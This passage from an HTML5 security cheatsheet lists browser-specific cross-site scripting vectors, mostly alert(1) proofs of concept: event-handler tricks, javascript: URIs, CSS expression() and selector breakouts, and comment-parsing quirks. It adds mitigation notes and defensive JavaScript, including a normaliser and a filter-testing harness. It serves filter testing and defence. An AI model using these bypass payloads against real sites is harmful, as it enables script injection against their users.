    Firefox, Internet Explorer, Safari, Google Chrome, Opera: 47
    Internet Explorer (5-9 SM): 0**
[c] Characters ignored between attribute name and equals sign.
    Firefox, Internet Explorer, Safari, Google Chrome, Opera: 9,10,12,13,32
    Internet Explorer (5-9 SM): 0,11
[d] Characters accepted as parameter/attribute separators.
    Firefox, Internet Explorer, Safari, Google Chrome, Opera: 9,10,12,13,32
    Internet Explorer (5-9 SM): 11
[e] Characters ignored between equals sign and parameter.
    Firefox, Internet Explorer, Safari, Google Chrome, Opera: 9,10,12,13,32
    Internet Explorer (5-9 SM): 0,11
* Characters are given as decimal ASCII table index.
** There is a common rule that the unencoded null character does not exist for the IE HTML parser.
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
- Firefox 4.0
- Firefox Latest
- Opera 9.X
- Opera Latest
- Chrome 5.0
- Chrome Latest
- Safari 4.0
- Safari Latest
- http://shazzer.co.uk/vector/Characters-allowed-after-script
- http://shazzer.co.uk/vector/Attribute-separators
- http://shazzer.co.uk/vector/Characters-allowed-before-attribute-name
- http://shazzer.co.uk/vector/Characters-allowed-after-attribute-name
- http://shazzer.co.uk/vector/Quoteless-attributes-breaker
- http://docs.google.com/Doc?docid=0ASCeV1AnDNdWZGQ3eDVzbXdfMTZoZGQzNGdneg
- #106
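The separator table above is only useful if a filter is actually tested against it. The following is an added example (not part of the original cheatsheet) that expands the [a]..[e] placeholders of the vector into every combination the listed browsers accept, and runs them against a deliberately naive home-grown filter that only knows space, tab, CR and LF. The filter function and the "all"/"ieSM" split are assumptions made for the example; the character codes are the ones from the table.

```javascript
'use strict';

// Separator table from the vector above, as decimal char codes. "all" lists
// what every browser on the page accepts, "ieSM" what only IE 5-9 standards
// mode adds on top.
const SLOTS = {
  a: { all: [9, 10, 12, 13, 32, 47], ieSM: [11] },  // tag name / attribute separators
  b: { all: [47], ieSM: [0] },                       // ignored before an attribute name
  c: { all: [9, 10, 12, 13, 32], ieSM: [0, 11] },    // ignored between name and "="
  d: { all: [9, 10, 12, 13, 32], ieSM: [11] },       // attribute separators
  e: { all: [9, 10, 12, 13, 32], ieSM: [0, 11] },    // ignored between "=" and value
};
const TEMPLATE = '<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">';

// Expand every [slot] placeholder into every character the scope allows,
// i.e. the cartesian product over the five slots.
function expand(template, scope) {
  let variants = [template];
  for (const slot of Object.keys(SLOTS)) {
    const codes = SLOTS[slot].all.concat(scope === 'ieSM' ? SLOTS[slot].ieSM : []);
    const next = [];
    for (const v of variants) {
      for (const code of codes) next.push(v.replace('[' + slot + ']', String.fromCharCode(code)));
    }
    variants = next;
  }
  return variants;
}

// A typical home-grown filter (assumed for this example): it collapses the
// whitespace it knows about and then looks for " on<name>=" with at most one
// space before the "=".
function naiveHasEventHandler(markup) {
  const normalised = markup.replace(/[ \t\r\n]+/g, ' ');
  return / on\w+ ?=/i.test(normalised);
}

// Every browser-accepted variant the naive filter lets through.
function evading(scope) {
  return expand(TEMPLATE, scope).filter((v) => !naiveHasEventHandler(v));
}

// Printable form of a vector, with control characters shown as \xNN.
function show(vector) {
  return vector.replace(/[\x00-\x1f]/g, (c) => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0'));
}

const accepted = expand(TEMPLATE, 'all');
const missed = evading('all');
console.log(accepted.length + ' variants accepted by every listed browser, ' + missed.length + ' missed by the naive filter');
for (const v of missed.slice(0, 5)) console.log('  ' + show(v));
```

Every miss involves form feed (12) in slot [c] or [d], a character the filter never normalises; running with scope 'ieSM' adds the null and vertical-tab variants on top.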
Characters ignored in the URI scheme (#101)
The following characters are ignored inside the URI scheme. Characters are given as decimal ASCII codes; "↓" means that version and earlier, "↑" that version and later.
[a] All mentioned browsers: 9, 10, 13, 32
    IE, GC, Safari, Opera: 11, 12
    IE, GC, Safari, FF 3.6.28↓: 8
    IE, GC, Safari: 1-7, 14-31
    Opera: 160, 5760, 6158, 8192-8202, 8232, 8233, 8239, 8287, 12288
    Opera 11.52↓: 6159
    IE (5-9 SM): 0
[b], [c] IE, GC, Safari 4.0.3↓, FF 4-6, Opera 10.63↓: 9, 10, 13
    GC 7↓, Safari 4.0.3↓: 1-8, 11, 12
    IE (5-9 SM): 0
    Safari 4.0.4↑, Opera 11↑, FF 7↑: nothing
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
- Internet Explorer 6.0
- Internet Explorer Latest
- Firefox 4.0
- Firefox Latest
- Opera 10.0
- Opera Latest
- Chrome 5.0
- Chrome Latest
- Safari 4.0
- Safari Latest
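A scheme allow-list is only as good as the normalisation that runs before it. The following is an added example (not from the original cheatsheet) of an href check that first strips the union of every character the table above lists as ignorable and only then reads the scheme, so that "java\tscript:" or a scheme preceded by a vertical tab is classified as javascript:. The allow-list and function names are assumptions for the example; the character ranges are taken from the table.

```javascript
'use strict';

// Union of the characters the browsers above ignore inside a URI scheme
// (decimal codes as on the page): C0 controls, space and DEL, plus the
// Unicode spaces Opera drops. A filter has to remove all of them before it
// looks at the scheme, otherwise the browser sees a different scheme than
// the filter did.
const IGNORED_RANGES = [
  [0, 32], [127, 127], [160, 160], [5760, 5760], [6158, 6159],
  [8192, 8202], [8232, 8233], [8239, 8239], [8287, 8287], [12288, 12288],
];

function isIgnored(code) {
  return IGNORED_RANGES.some(([lo, hi]) => code >= lo && code <= hi);
}

// Remove every ignorable character so that "java\tscript" reads as "javascript".
function stripIgnored(url) {
  return Array.from(url).filter((ch) => !isIgnored(ch.codePointAt(0))).join('');
}

// The scheme a browser would see, lower-cased, or null for a relative URL.
// A ':' only introduces a scheme if nothing but scheme characters precede it,
// so "foo/bar:baz" and "/x?next=javascript:" stay relative.
function effectiveScheme(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(stripIgnored(url));
  return m ? m[1].toLowerCase() : null;
}

// Allow-list check for user supplied href values (allow-list assumed).
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeLinkTarget(url) {
  const scheme = effectiveScheme(url);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

for (const candidate of ['http://example.com/', 'java\tscript:alert(1)', '\u000bjavascript:alert(1)']) {
  console.log(JSON.stringify(candidate), '->', isSafeLinkTarget(candidate) ? 'allowed' : 'blocked');
}
```

The stripped string is used only to classify the URL; what gets emitted into the page should still be the allow-listed original, re-serialised by a URL parser rather than passed through verbatim.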
Forced plaintext via unbalanced quotes in Internet Explorer (#102)
Internet Explorer treats a tag as plaintext when its attribute delimiters are unbalanced - in this example caused by the ` characters. If unbalanced quotes appear inside or outside an attribute, preceded by any character other than the equals sign, HTML placed inside the attribute is rendered as regular markup. The problem has been reported and is to be taken care of in later versions of Internet Explorer.
<img src="x` `<script>alert(1)</script>"` `>
- Internet Explorer 6.0
- Internet Explorer 8.0 (Unpatched)
Safari attribute obfuscation with slashes and quotes (#106)
Safari accepts slashes and quotes (if preceded by whitespace, slashes or other quotes) between the attribute name and the equals sign (name/"'=value). This opens up interesting possibilities to obfuscate HTML strings, bypass filters and mimic attributes, as in the given example.
<img src onerror /" '"= alt=alert(1)//">
- Safari 4.0
- Safari 4.0.3
JavaScript execution via <TITLE> tag on Internet Explorer 9 (#107)
Internet Explorer 9 allows execution of JavaScript via an onpropertychange event handler on <title> tags if another <title> tag with at least one valid attribute follows. This vector works in IE6-8 standards mode and in IE9 quirks mode.
<title onpropertychange=alert(1)></title><title title=></title>
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Internet Explorer parameter parsing issue (#108)
Internet Explorer treats any quote character that follows the equals sign of an undelimited attribute value as the beginning of something resembling a new attribute.
<!-- IE 5-8 standards mode -->
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">
<!-- IE 5-9 standards mode -->
<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Internet Explorer conditional comments - XSS via [if]> and <img> injection (#115)
Conditional comments in Internet Explorer cause trouble as soon as an attacker is able to inject square brackets wrapping the words if and endif, with almost arbitrary suffixes. A condition that is always true leads to immediate parsing of the enclosed markup on all tested Internet Explorer versions. The second example injects an <img> tag into the comment condition, leading to immediate JavaScript execution as well. The examples work up to IE 9 standards mode.
<!--[if]><script>alert(1)</script -->
<!--[if<img src=x onerror=alert(2)//]> -->
Make sure an attacker cannot turn a comment injection into a conditional comment by using square brackets as shown in the example. Comment content should be escaped like regular markup - the delimiting sequence --> is neither sufficient nor necessary to successfully close a comment.
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Backslashes as alternative to slashes on WebKit (#124)
Safari treats backslashes the same way as slashes inside URL attributes. Chrome treats the URL prefix "/\" the same way as "//".
<script src="/\example.com\foo.js"></script> <!-- Safari 5.0, Chrome 9, 10 -->
<script src="\\example.com\foo.js"></script> <!-- Safari 5.0 -->
- Chrome 9.0
- Chrome Latest
- Safari 5.0
- Safari Latest
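The backslash-as-slash behaviour described above is no longer a WebKit quirk: the WHATWG URL parser that Node's URL class and current browsers implement treats "\" like "/" for http and https, so a src value starting with a single slash can still resolve to a foreign host. The following is an added example (not from the original cheatsheet) that compares a string-prefix "is this a site-relative path" check with a check done on the parsed URL. The origin https://site.example/ is a hypothetical value chosen for the example.

```javascript
'use strict';

// Hypothetical origin the user supplied URL is resolved against.
const SITE_ORIGIN = 'https://site.example/';

// Host the resource will actually be fetched from, as a WHATWG URL parser
// (Node's URL, modern browsers) resolves it. Backslashes are treated as
// slashes for special schemes such as http(s), so "/\example.com\foo.js"
// becomes https://example.com/foo.js.
function resolvedHost(input, base = SITE_ORIGIN) {
  return new URL(input, base).host;
}

// Same-origin decision taken on the parsed result, not on the raw string.
function isSameOriginResource(input, base = SITE_ORIGIN) {
  return new URL(input, base).origin === new URL(base).origin;
}

// The kind of string check this trick defeats: one leading slash looks like
// a site-relative path, so "/\example.com\foo.js" passes.
function naiveIsRelativePath(input) {
  return input.startsWith('/') && !input.startsWith('//');
}

for (const src of ['/foo.js', '/\\example.com\\foo.js', '\\\\example.com\\foo.js']) {
  console.log(JSON.stringify(src), 'naive:', naiveIsRelativePath(src),
    'host:', resolvedHost(src), 'same-origin:', isSameOriginResource(src));
}
```

Whenever a policy depends on where a URL points, resolve it with the same parser the consumer will use and compare origins on the result; prefix checks on the raw string are exactly what vectors like this one are built to pass.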
QuickTime events causing JavaScript execution (#126)
The construct shown below enables the use of the little-known QuickTime DOM events. Those contain an underscore - which is rather uncommon for event handlers and thus bypasses many blacklist-based filters. The attack only works if both <object> tags are in place: the first <object> tag supplies the necessary behavior for the second one.
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
- Internet Explorer 6.0
- Internet Explorer 10.0
Ending HTML comments with a backtick character (#133)
On older versions of Internet Explorer a backtick character can be used to end an HTML comment and inject otherwise commented-out markup. An HTML filter that allows comments can be bypassed with this trick, allowing an attacker to inject arbitrary HTML.
<!-- `<img/src=xx:xx onerror=alert(1)//--!>
Make sure an attacker cannot inject into HTML comments, and bear in mind that the string "-->" is by far not the only way to end an HTML comment.
- Internet Explorer 6.0
- Internet Explorer 8.0
"<% %>" and "<!-- -->" inside plaintext tags#134test
The structures "<%" and "<!--" cause the IE parser to treat the closing tag of plaintext tags such as <textarea>, <comment>, <xmp> and others as part of the plaintext until it finds the matching "%>" or "-->". Inside tags such as <style> and <script> the syntax must remain valid with these sections taken into account, otherwise an exception is thrown. Thus the second example shows that the closing </script> tag is treated as a "less than" operator followed by the start of a regular expression. The examples work up to IE 9 standards mode. SGML-like comment delimiters are parsed similarly in older versions of Safari.
<xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'>
<script> x='<%' </script> %>/ alert(2) </script> XXX
<style> *['<!--']{} </style> -->{} *{color:red}</style>
Encode all opening angle brackets inside plaintext tags. Escaping only the closing tags ("<\/script>") is not sufficient.
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
- Safari 3.0
- Safari 4.0.3
JavaScript execution via <FRAMESET> and onpageshow (#146)
The <FRAMESET> element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists, as the event is not very well known. Note that the <BODY> tag exposes the same behavior.
<frameset onpageshow="alert(1)">
<body onpageshow="alert(1)">
Be sure to work with whitelists when allowing users to submit markup - otherwise ancient tags like <FRAMESET> may be forgotten when filtering and escaping.
- Chrome 4.0
- Chrome Latest
- Opera 12.0
- Opera Latest
- Internet Explorer 9.0
- Internet Explorer Latest
- Firefox 4.X
- Firefox Latest
- Safari 4.0
- Safari Latest
JavaScript execution via <APPLET> with error events (#149)
The <APPLET> element fires an "onerror" event without user interaction on Internet Explorer and Edge. This can be used to bypass WAF and IDS systems, as this combination of tag and attribute is by now rather uncommon and little known.
<applet onerror="alert(1)"></applet>
Be sure to work with whitelists when allowing users to submit markup - otherwise legacy tags like <APPLET> may be forgotten when filtering and escaping.
- Internet Explorer 11.0
- Internet Explorer Latest
Cascading stylesheet injection based vectors
Opera link-source JavaScript execution via CSS (#9)
Opera allows setting link sources for arbitrary HTML elements - making them clickable and able to execute JavaScript. Note that Opera 11.0-11.01 requires an actual <a> tag for this to work, while earlier versions work with other tags too. In later versions a data URI is still available as the link target.
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
- Opera 8.0
- Opera 12.0 (Limited)
Opera whole-page click hijacking via CSS (#27)
Opera as well as other browsers allow breaking out of attribute selectors and other CSS constructs with {...} - opening the possibility of declaring new properties and assigning values, such as -o-link and -o-link-source. In this case those proprietary properties allow overlaying any selected element with a JavaScript URI link. Note that as of Opera 11 -o-link only applies to <a> tags. On IE the selector breaks up to IE 7 standards mode.
<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
In case users are allowed to submit CSS, make sure the allowed properties are whitelisted and attribute selector content does not allow the combination {...}, because it breaks out of the attribute selector and allows the declaration of new properties.
- Opera 8.X
- Opera 11.64
JavaScript execution via <LINK> href attribute and data URI (#29)
Contrary to its documentation, Internet Explorer 8 supports data URIs not only for displaying images but also for supplying stylesheet information. This can be used to wrap expression() CSS into a data URI and execute JavaScript with a <LINK> tag. The example works up to IE 7 standards mode.
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
Make sure stylesheet URIs cannot be controlled by the user - and that user submitted <LINK> tags are not displayed unfiltered.
- Internet Explorer 8.0
- Internet Explorer 10.0
JavaScript execution via <STYLE> @import and data URI (#30)
Contrary to its documentation, Internet Explorer 8 supports data URIs not only for displaying images but also for supplying stylesheet information. This can be used to wrap expression() CSS into a data URI and execute JavaScript with a <STYLE> @import directive. The example works up to IE 7 standards mode.
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
Make sure stylesheet URIs cannot be controlled by the user - and that user submitted <STYLE> content cannot contain the @import directive.
- Internet Explorer 8.0
- Internet Explorer 10.0
Breaking pointer-events:none with nested links (#33)
Firefox 3.6+ allows using CSS "pointer-events" with the value "none" to make sure an element will not react to any mouse/pointer based event. This feature enables, for example, placing a DIV over another DIV without blocking the click events addressed to the underlying DIV.
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
The feature breaks as soon as <A> elements carrying "pointer-events:none" contain other <A> elements. <A> elements should not be used for pointer-event logic at all - especially not when containing user controlled HTML.
- Firefox 3.6
- Firefox Latest
- Safari 5.0
- Safari Latest
- Chrome 7.0
- Chrome Latest
- Internet Explorer 10.0
- Internet Explorer Latest
- Opera 10.0
- Opera Latest
Opera @import based XSS inside attribute selectors (#44)
Opera 10 and later versions, including the latest Opera 10.5, allow breaking out of an attribute selector with {} and using @import declarations afterwards. The MIME type of the imported file does not matter, and it can be loaded from arbitrary domains. The imported file contains CSS code applying a JavaScript URI to all elements on the page to hijack any incoming click.
<style>*[{}@import'test.css?]{color: green;}</style>X
Make sure the contents of attribute selectors in user submitted CSS are properly escaped with backslashes. Also use a CSS property:value whitelist to forbid properties like -o-link and -o-link-source.
Attached file test.css (http://html5sec.org/test.css, crossdomain: 1):
* {-o-link:'javascript:alert(1)';-o-link-source: current;}
- Opera 8.0
- Opera 11.64
CSS string breaking (#45)
Opera, Firefox and other browsers allow breaking out of a CSS string with newline characters, since a string cannot directly contain a newline in CSS2+. Characters are given as decimal ASCII codes; "↓" means that version and earlier.
[a] Characters accepted as CSS string breakers:
    Firefox, Internet Explorer (IE8+ standards mode), Opera, Google Chrome, Safari: 10, 12, 13
    Opera 11.01↓, Google Chrome 16↓, Safari: 1-8, 11, 14-31, 127
    Opera 11.01↓: 0
<div style="font-family:'foo[a];color:red;';">XXX</div>
- Opera 8.0
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 3.0
- Safari Latest
- Internet Explorer 8.0
- Internet Explorer Latest
Alternative CSS syntax in Internet Explorer (#46)
Internet Explorer allows using the right curly brace (}) as a group separator (up to IE 7 standards mode). In quirks mode (IE 5 standards mode) a CSS declaration may consist of a property name followed by an equals sign (=) instead of a colon.
<div style="font-family:foo}color=red;">XXX</div>
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmodes)
Obfuscating CSS properties and values via ignored extra characters (#60)
Characters are given as decimal codes.
[a] Extra characters ignored before property names (excluding backslash (92) and the null character (0)):
    Firefox, Internet Explorer (any mode), Safari, Google Chrome, Opera: 9, 10, 12, 13, 32
    Firefox, Internet Explorer**, Opera: 123***
    Firefox 3.x, Internet Explorer**: 8
    Internet Explorer**: 1-7, 11, 14-31, 33, 35-38, 40-44, 46-47, 58, 60-64, 91, 93-96, 124-127, 160, 8192-8203, 12288, 65279
    Internet Explorer**: CSS strings
[b] Extra characters ignored between property names and the colon:
    Firefox, Internet Explorer (any mode), Safari, Google Chrome, Opera: 9, 10, 12, 13, 32
    Internet Explorer**: 11
    Internet Explorer (quirks mode): 1-8, 14-31, 33, 35-38, 40-44, 46-47, 60, 62-64, 91, 93, 94, 96, 123, 124, 126, 127
    Internet Explorer (quirks mode): CSS strings, alphanumeric sequences after non-alphanumeric characters (color,foo:red)
[c] Extra characters ignored before values:
    Firefox, Internet Explorer, Safari, Google Chrome, Opera: 9, 10, 12, 13, 32
    Internet Explorer: 0, 11, 160, 8192-8203, 12288, 65279
** Up to IE 7 standards mode.
*** Ignored only before the first property name.
<div style="[a]color[b]:[c]red">XXX</div>
- Firefox 2.X
- Firefox Latest
- Opera 9.X
- Opera Latest
- Internet Explorer 6.0
- Internet Explorer Latest
- Chrome 5.0
- Chrome Latest
- Safari 4.0
- Safari Latest
CSS encoding and escaping (#61)
Whitespace characters are given as decimal codes; "↓" means that version and earlier.
[a] Encoding. There are only three ways to vary an encoded character:
    [1] You can change the number of leading zeros: \0A -> \00000A
    [2] You can change the letter case: \0A -> \0a
    [3] You can change the whitespace character accepted as delimiter after the encoded character:
        Firefox, Google Chrome, Internet Explorer, Opera, Safari: 9, 10, 12, 13, 32
        Internet Explorer (IE7↓ standards mode): 11, 160, 8192-8203, 12288, 65279
    Properties in IE7↓ standards mode may contain an encoded null character (\0). On Opera and in IE8+ standards mode an encoded null character cuts off the right side of a CSS structure. The set of characters that can be encoded differs between browsers; for example, Firefox cannot encode the parentheses that are part of the functional notation.
[b] Escaping. In addition, you can put a backslash before the character. In Internet Explorer 7↓ standards mode, escaping any whitespace character accepted as delimiter is another way of writing a null character: col\ or:red. In IE quirks mode a backslash inside the url() function can be treated as equivalent to a slash and thus loses its escape role. Of course, these methods can be combined with other encodings and obfuscations (for example, changing the case of the original characters).
<div style="\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;">XXX</div>
- Firefox 1.5
- Firefox Latest
- Opera 8.0
- Opera Latest
- Internet Explorer 6.0
- Internet Explorer Latest
- Chrome 7.0
- Chrome Latest
- Safari 4.0
- Safari Latest
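A filter that compares property names against the raw text will never see "color" in the vector above. The following is an added example (not from the original cheatsheet) of a CSS escape decoder implementing the three encoding variations described in #61 (variable leading zeros, letter case, one swallowed whitespace delimiter) plus backslash-escaped literals, so that a filter can run on the canonical form. It also refuses declarations containing an encoded null, since the page shows browsers disagree on what a null does; the function names and the decision to reject nulls are choices made for this example.

```javascript
'use strict';

// Whitespace a browser swallows as the delimiter after a hex escape (codes
// 9, 10, 12, 13, 32 from the table above; CRLF counts as one delimiter).
const DELIMITERS = new Set(['\t', '\n', '\f', '\r', ' ']);

// Decode CSS escapes the way a tokenizer does:
//   \63      -> "c"  one to six hex digits, any number of leading zeros,
//                    upper or lower case, one following delimiter swallowed
//   \R       -> "R"  backslash before a non-hex character escapes it literally
// Code points above U+10FFFF are replaced by U+FFFD; a null escape is kept
// as U+0000 so the caller can detect it. (Backslash-newline continuation
// inside strings is not handled; it is not needed for property names.)
function decodeCssEscapes(text) {
  let out = '';
  let i = 0;
  while (i < text.length) {
    if (text[i] !== '\\' || i + 1 >= text.length) { out += text[i++]; continue; }
    let j = i + 1;
    let hex = '';
    while (j < text.length && hex.length < 6 && /[0-9a-fA-F]/.test(text[j])) hex += text[j++];
    if (hex.length === 0) {                 // escaped literal character
      out += text[j];
      i = j + 1;
      continue;
    }
    const cp = parseInt(hex, 16);
    out += cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
    if (j < text.length && DELIMITERS.has(text[j])) {   // swallow one delimiter
      j += (text[j] === '\r' && text[j + 1] === '\n') ? 2 : 1;
    }
    i = j;
  }
  return out;
}

// Canonical "property:value" text for comparison against an allow-list.
// Returns null when the decoded text contains a null character, which the
// page shows is handled differently per browser (allowed inside property
// names in IE7 and earlier, truncating on Opera and IE8+).
function canonicalDeclaration(text) {
  const decoded = decodeCssEscapes(text);
  if (decoded.includes('\u0000')) return null;
  const colon = decoded.indexOf(':');
  if (colon < 0) return decoded.trim().toLowerCase();
  return decoded.slice(0, colon).trim().toLowerCase() + ':' + decoded.slice(colon + 1).trim();
}

// The first declaration of the vector above, with its tab and newline delimiters.
const OBFUSCATED = '\\63\t\\06f\n\\0006c\\00006F\n\\R:\\000072 Ed;';
console.log(JSON.stringify(OBFUSCATED), '->', canonicalDeclaration(OBFUSCATED));
console.log(JSON.stringify('color\\0\\bla:yellow'), '->', canonicalDeclaration('color\\0\\bla:yellow'));
```

Run the allow-list on the canonical form and, when the decoded text is rejected or contains a null, drop the whole declaration rather than trying to repair it.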
Slash-tags accepting style attributes (#71)
A slash-tag can still carry style attributes on IE, as the example shows. For extra obfuscation a bogus CSS property is used to execute the JavaScript via expression() combined with CSS escapes. This example works up to IE 7 standards mode.
<// style=x:expression\28write(1)\29>
Make sure the HTML filter you use deals with slash-tags and doesn't consider them to be plain text. Also be aware of CSS escapes and how they can completely obfuscate any style info inside <STYLE> tags and "style" attributes.
- Internet Explorer 6.0
- Internet Explorer 10.0
IE6 and halfwidth/fullwidth Unicode characters (#80)
This example shows how halfwidth/fullwidth Unicode characters can be used on IE6 to substitute characters from the ASCII range. In the example, fullwidth letters are used to spell the term "expression".
<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(write(1))}</style>
In case your website still has a lot of IE6 users make sure that the range of halfwidth and fullwidth form characters (U+FF00-FFEF) cannot be used in user submitted markup and styles.
- Internet Explorer 6.0
SVG images containing XML data - with disabled JavaScript (#90)
Opera supports the CSS property "content" in style attributes. The SVG image can contain SVG as well as HTML code. The example for Opera 10.x shows how a <FORM> tag can be used to trick the user into clicking a button and thus executing JavaScript. The example for Opera 12.x shows one of the problems (along with a client side DoS, firing the "onblur" event, etc.) arising from the possibility of stealing focus via an embedded SVG image. The same of course works for SVG files embedded via <IMG> tags.
<!-- Up to Opera 10.63 -->
<div style=content:url(test2.svg)></div>
<!-- Up to Opera 11.64 - see link below -->
<!-- Up to Opera 12.x -->
<div style="background:url(test5.svg)">PRESS ENTER</div>
Attached file test5.svg (http://html5sec.org/test5.svg, required MIME type: image/svg+xml, crossdomain: 0):
<form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)">
<!-- this file can be crossdomain if "action" attribute refers to an external file -->
<meta http-equiv="refresh" content="1;URL=test5.svg"/>
<input type="submit" autofocus="autofocus"/>
</form>
- Opera 10.X
- Opera 12.0
Breaking the functional notation on IE (1) (#92)
To break the functional notation "url()" on IE, a whitespace character followed by any non-whitespace character can be placed inside it. The following characters (decimal codes) count as whitespace: IE 6 and 7 standards mode: 9-13, 32, 160, 8192-8203, 12288, 65279. IE 8 standards mode: 1-32, 127.
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Multiple CSS "url()" values in IE 6 (#93)
Internet Explorer 6 supports multiple "url()" values, all of which can carry a payload. The delimiter between the "url()" values has to be a whitespace character ("\20", an escaped space, in the given example).
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
Make sure that CSS users are allowed to submit is filtered and whitelisted correctly, to avoid attacks via multiple backgrounds.
- Internet Explorer 6.0
Style injection when copying innerHTML (3) (#98)
The example shows that Internet Explorer and Mozilla Firefox automatically decode CSS encoding when otherwise harmless markup is copied via innerHTML. The escapes in the example decode to sans'/*"*/; color:red;, so after the copy the font-family string is closed and a new color declaration appears.
<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>
Be very careful when handling user generated HTML in the DOM later on. The innerHTML property does not always contain what it is supposed to.
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
- Firefox 2.X
- Firefox 3.6.28
Using comments to obfuscate styles (#99)
As noted in the CSS2.1 specification (and repeated in CSS3), comments may occur anywhere outside other tokens. The exceptions to this rule deserve special attention. First of all the CSS2.1 specification is inconsistent, since, for example, the definition of the "!important" token allows comments. Although CSS3 dropped this feature, IE (8-9 standards mode) and Firefox 13 still support "!/**/important". More obvious mistakes can be found; for example, the same Firefox 13 allows "font-family: Ar/**/ial". Of special interest are the exceptions to this rule in IE. The first example shows the possibility of comments inside the value of a property. The third example, in addition to demonstrating the same possibility inside the "url()" function, is also an interesting case where the comment cannot be replaced by any other construct (another space or an encoded space "\000020" will not give the necessary effect). Typically these cases occur when the token does not match its precise definition: here the token "url(" cannot contain a space character. Inside the <STYLE> tag there are rules for parsing the SGML comment delimiters, which are allowed before and after statements regardless of their form (opening/closing) and nesting.
XXX<style>
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
<!-- --><!--*{color:red} /* all UA */
*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
</style>
- Internet Explorer 6.0
- Internet Explorer Latest
- Firefox 3.X
- Firefox Latest
- Opera 9.X
- Opera Latest
- Chrome 4.0
- Chrome Latest
- Safari 3.0
- Safari Latest
Breaking the functional notation on Chrome and Safari (2) (#111)
To break the functional notation "url()", it can be combined with the following characters (decimal ASCII codes): [a] 1-8, 10-31, 127, 9, 32, 40. Note that breaking the functional notation and a string at the same time can be accomplished with the characters listed in #45.
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
- Chrome 5.0
- Chrome Latest
- Safari 4.0
- Safari Latest
Breaking the functional notation on IE (3) (#112)
If any* part of a CSS declaration (property or value) contains a left curly brace ({, not as part of a string), the declaration cannot be closed without a matching right curly brace (}). In most browsers this cannot be used to bypass filters, as they require strings, functions and attribute selectors inside such blocks to be closed. IE, however, does not require functions inside such blocks to be closed. This is especially important when the filtered styles sit inside the targeted tag's style attribute. The example works up to IE 7 standards mode. *There is another exception for IE (see [a] and [b] of #60).
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Jump into the selector via attribute delimiters (#113)
In practice selectors are usually filtered less thoroughly by filtering software than other parts of CSS. This example shows how to leave a CSS block open, get hold of a selector and inject code into that possibly less thoroughly filtered area. On IE this example works in IE 8-9 standards mode.
<div id="x">XXX</div>
<style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
- Firefox 2.X
- Firefox Latest
- Opera 9.X
- Opera 12.0
- Internet Explorer 8.0
- Internet Explorer Latest (In Older Docmodes)
Breaking the functional notation on Chrome and Safari (4) (#114)
The functional notation breaker shown in #111 also works with quoted strings for several CSS properties. The following characters (decimal ASCII codes; "↓" means that version and earlier, "↑" that version and later) can be used to break the string and create a new property-value pair: [a] Safari, Chrome 16↓: 1-8, 10-31 and 127. Chrome 17↑: 10, 12, 13.
<x style="background:url('x[a];color:red;/*')">XXX</x>
- Chrome 5.0
- Chrome Latest
- Safari 4.0
- Safari Latest
- Opera 15.0
- Opera Latest
Plain JavaScript vectors
Firefox setter based JavaScript execution (#6)
Using setters on Gecko/Firefox to execute JavaScript without parentheses.
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
- Firefox 1.X
- Firefox 3.6.28
JavaScript execution via sharp variables (#15)
This vector demonstrates how sharp variables and cyclic references can be used for obfuscation, hiding the actual method call.
<script>({0:#0=alert/#0#/#0#(0)})</script>
- Firefox 2.X
- Firefox 11.0
JavaScript execution via overwritten ReferenceError object (#20)
This JavaScript vector shows how overwriting the ReferenceError object and then causing exactly that kind of error can lead to JavaScript execution. The same of course applies to most other error objects and should be taken into consideration when implementing JavaScript sandboxes or the like.
